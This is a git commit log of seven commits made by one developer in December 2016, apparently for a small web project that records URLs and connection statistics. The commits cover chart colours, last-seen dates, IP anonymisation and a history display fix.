commit a0494d3dfd895934d3ab9e5ecf9fe215cf9f622e
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 16:29:58 2016 +0100

    Fix connection history display

commit 198af01efb297140fcdede04ccb09fa9c446ecda
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 03:26:31 2016 +0100

    Anonymize IP's

commit f2910964c41aa6efd68ee9dd6926cde0a60ad203
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 02:49:08 2016 +0100

    Last seen date on stats

commit 05291349ed6b46d39def01c0ceda5b7e5e9b4094
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 02:26:40 2016 +0100

    Persistent chart colors

commit 89cb542ef3e9b19cf5fb0c4f98822802b45d648c
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Thu Dec 8 02:15:42 2016 +0100

    Do not forget urls which are alady known for statistics

commit ebc6d65a7759dcd08c0c90c2b5b705bb309a63c9
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Dec 7 22:56:11 2016 +0100

    Add github link to html

commit 236709e61f41cc002865b99ba658a335ff582987
Author: Philipp Jeitner <p.jeitner@gmail.com>
Date:   Wed Dec 7 22:51:49 2016 +0100

    Initial commit
